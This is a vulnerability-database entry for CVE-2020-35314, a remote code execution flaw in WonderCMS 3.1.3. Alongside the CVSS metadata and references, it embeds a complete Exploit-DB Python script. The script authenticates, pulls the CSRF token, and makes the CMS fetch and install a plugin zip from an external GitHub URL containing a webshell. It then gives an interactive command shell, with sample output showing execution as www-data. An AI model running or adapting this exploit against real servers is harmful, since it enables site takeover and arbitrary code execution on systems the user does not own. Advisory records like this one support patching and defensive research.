Description
A remote code execution vulnerability in the installUpdateThemePluginAction function in index.php in WonderCMS 3.1.3, allows remote attackers to upload a custom plugin which can contain arbitrary code and obtain a webshell via the theme/plugin installer.
Affected Software
Related
{"id": "CVE-2020-35314", "vendorId": null, "type": "cve", "bulletinFamily": "NVD", "title": "CVE-2020-35314", "description": "A remote code execution vulnerability in the installUpdateThemePluginAction function in index.php in WonderCMS 3.1.3, allows remote attackers to upload a custom plugin which can contain arbitrary code and obtain a webshell via the theme/plugin installer.", "published": "2021-04-20T20:15:00", "modified": "2021-06-01T20:34:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {"cvssV2": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "baseScore": 7.5}, "severity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}, "cvss3": {"cvssV3": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL"}, "exploitabilityScore": 3.9, "impactScore": 5.9}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-35314", "reporter": "cve@mitre.org", "references": ["https://github.com/robiso/wondercms", "https://packetstormsecurity.com/files/160311/WonderCMS-3.1.3-Remote-Code-Execution.html", "https://zetc0de.github.io/post/authenticated-rce-ssrf-wondercms/", "https://zetc0de.github.io/post/authenticated-rce-ssrf-wondercms/#authenticated-remote-code-execution"], "cvelist": ["CVE-2020-35314"], "immutableFields": [], "lastseen": "2022-03-23T17:48:25", "viewCount": 31, "enchantments": {"dependencies": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:49155"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:160311"]}], "rev": 4}, "score": {"value": 8.0, "vector": "NONE"}, "twitter": {"counter": 2, "modified": "2021-04-28T11:39:26", "tweets": [{"link": "https://twitter.com/threatintelctr/status/1399833246712610824", "text": " NEW: CVE-2020-35314 A remote code execution vulnerability in the installUpdateThemePluginAction function in index.php in WonderCMS 3.1.3, allows remote attackers to upload a custom plugin which can contain arbi... (click for more) Severity: CRITICAL https://t.co/IYWtlkWuVi?amp=1"}, {"link": "https://twitter.com/threatintelctr/status/1399833246712610824", "text": " NEW: CVE-2020-35314 A remote code execution vulnerability in the installUpdateThemePluginAction function in index.php in WonderCMS 3.1.3, allows remote attackers to upload a custom plugin which can contain arbi... (click for more) Severity: CRITICAL https://t.co/IYWtlkWuVi?amp=1"}]}, "backreferences": {"references": [{"type": "exploitdb", "idList": ["EDB-ID:49155"]}]}, "exploitation": null, "vulnersScore": 8.0}, "_state": {"dependencies": 0}, "_internal": {}, "cna_cvss": {"cna": null, "cvss": {}}, "cpe": ["cpe:/a:wondercms:wondercms:3.1.3"], "cpe23": ["cpe:2.3:a:wondercms:wondercms:3.1.3:*:*:*:*:*:*:*"], "cwe": ["CWE-78"], "affectedSoftware": [{"cpeName": "wondercms:wondercms", "version": "3.1.3", "operator": "eq", "name": "wondercms"}], "affectedConfiguration": [], "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"operator": "OR", "children": [], "cpe_match": [{"vulnerable": true, "cpe23Uri": "cpe:2.3:a:wondercms:wondercms:3.1.3:*:*:*:*:*:*:*", "cpe_name": []}]}]}, "extraReferences": [{"url": "https://github.com/robiso/wondercms", "name": "https://github.com/robiso/wondercms", "refsource": "MISC", "tags": ["Product", "Third Party Advisory"]}, {"url": "https://packetstormsecurity.com/files/160311/WonderCMS-3.1.3-Remote-Code-Execution.html", "name": "https://packetstormsecurity.com/files/160311/WonderCMS-3.1.3-Remote-Code-Execution.html", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://zetc0de.github.io/post/authenticated-rce-ssrf-wondercms/", "name": "https://zetc0de.github.io/post/authenticated-rce-ssrf-wondercms/", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://zetc0de.github.io/post/authenticated-rce-ssrf-wondercms/#authenticated-remote-code-execution", "name": "https://zetc0de.github.io/post/authenticated-rce-ssrf-wondercms/#authenticated-remote-code-execution", "refsource": "MISC", "tags": ["Exploit", "Third Party Advisory"]}]}
{"exploitdb": [{"lastseen": "2022-05-13T17:42:26", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-02T00:00:00", "type": "exploitdb", "title": "WonderCMS 3.1.3 - Authenticated Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2020-35314", "CVE-2020-35314"], "modified": "2020-12-02T00:00:00", "id": "EDB-ID:49155", "href": "https://www.exploit-db.com/exploits/49155", "sourceData": "# Exploit Title: WonderCMS 3.1.3 - Authenticated Remote Code Execution\r\n# Date: 2020-11-27\r\n# Exploit Author: zetc0de\r\n# Vendor Homepage: https://www.wondercms.com/\r\n# Software Link: https://github.com/robiso/wondercms/releases/download/3.1.3/WonderCMS-3.1.3.zip\r\n# Version: 3.1.3\r\n# Tested on: Ubuntu 16.04\r\n# CVE : CVE-2020-35314\r\n\r\n\r\n# WonderCMS is vulnerable to Authenticated Remote Code Execution.\r\n# In order to exploit the vulnerability, an attacker must have a valid authenticated session on the CMS.\r\n# Using the theme/plugin installer attacker can install crafted plugin that contain a webshell and get RCE.\r\n\r\n# python3 exploit.py http://wonder.com/loginURL GpIyq0RH \r\n# -------------\r\n# [+] Getting Token\r\n# [+] Sending Payload\r\n# [+] Get the shell\r\n# [+] Enjoy!\r\n# $id\r\n# uid=33(www-data) gid=33(www-data) groups=33(www-data)\r\n\r\nimport requests\r\nimport sys\r\nimport re\r\nfrom bs4 import BeautifulSoup\r\nfrom termcolor import colored\r\n\r\n\r\nprint(colored('''\r\n\r\n\\ \\ /_ \\ \\ | _ \\ __| _ \\ __| \\ | __| \r\n \\ \\ \\ /( |. | | |_| / ( |\\/ |\\__ \\ \r\n \\_/\\_/\\___/_|\\_|___/___|_|_\\\\___|_| _|____/ \r\n \r\n------[ Auth Remote Code Execution ]------\r\n\t''',\"blue\"))\r\n\r\nif len(sys.argv) != 3:\r\n print(colored(\"[-] Usage : ./wonder.py loginURL password\",\"red\"))\r\n exit()\r\n\r\nloginURL = sys.argv[1]\r\npassword = sys.argv[2]\r\n\r\nr = requests.session()\r\ndata = { \"password\" : password }\r\npage = r.post(loginURL,data)\r\nif \"Wrong\" in page.text:\r\n\tprint(colored(\"[!] Exploit Failed : Wrong Credential\",\"red\"))\r\n\texit()\r\n\r\nprint(colored(\"[+] Getting Token\",\"blue\"))\r\nsoup = BeautifulSoup(page.text, \"html.parser\")\r\n\r\nallscript = soup.find_all(\"script\")\r\nno = 0\r\nfor i in allscript:\r\n\tif \"rootURL\" in str(i):\r\n\t\turl = i.string.split(\"=\")[1].replace('\"','').strip(\";\").lstrip(\" \")\r\n\telif \"token\" in str(i):\r\n\t\ttoken = i.string.split(\"=\")[1].replace('\"','').strip(\";\").lstrip(\" \")\r\n\r\npayload = \"https://github.com/zetc0de/wonderplugin/archive/master.zip\"\r\n\r\ndef sendPayload(req,url,payload,token):\r\n\tgetShell = url + \"?installThemePlugin=\" + payload + \"&type=plugins&token=\" + token\r\n\treq.get(getShell)\r\n\tshell = url + \"plugins/wonderplugin/evil.php\"\r\n\tcheckshell = req.get(shell)\r\n\tif \"1337\" in checkshell.text:\r\n\t\treturn True\r\n\telse:\r\n\t\treturn False\r\n\r\nprint(colored(\"[+] Sending Payload\",\"blue\"))\r\nshell = sendPayload(r,url,payload,token)\r\n\r\n\r\nif shell == True:\r\n\tprint(colored(\"[+] Get the shell\",\"blue\"))\r\n\tprint(colored(\"[+] Enjoy!\",\"blue\"))\r\n\tshell = url + \"plugins/wonderplugin/evil.php\"\r\n\twhile True:\r\n\t\tcmd = input(\"$\")\r\n\t\tdata = { \"cmd\" : cmd }\r\n\r\n\t\tres = r.post(shell,data)\r\n\t\tif res.status_code == 200:\r\n\t\t\tprint(res.text)\r\nelif shell == False:\r\n\tprint(colored(\"[+] Get the shell\",\"blue\"))\r\n\tprint(colored(\"[+] Enjoy!\",\"blue\"))\r\n\tshell = url + \"plugins/wonderplugin-master/evil.php\"\r\n\twhile True:\r\n\t\tcmd = input(\"$\")\r\n\t\tdata = { \"cmd\" : cmd }\r\n\t\tres = r.post(shell,data)\r\n\t\tif res.status_code == 200:\r\n\t\t\tprint(res.text)\r\nelse:\r\n\tprint(colored(\"[!] Failed to exploit\",\"red\"))", "sourceHref": "https://www.exploit-db.com/download/49155", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
CVE-2020-35314
